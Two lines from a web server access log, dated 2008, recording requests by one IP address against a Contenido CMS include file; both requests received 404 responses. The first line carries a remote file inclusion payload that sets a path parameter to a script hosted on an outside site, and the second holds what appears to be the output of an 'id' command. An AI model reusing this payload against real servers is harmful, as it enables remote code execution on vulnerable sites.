77.90.20.2 - - [07/Aug/2008:08:23:17 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 343 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
77.90.20.2 - - [07/Aug/2008:08:23:22 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
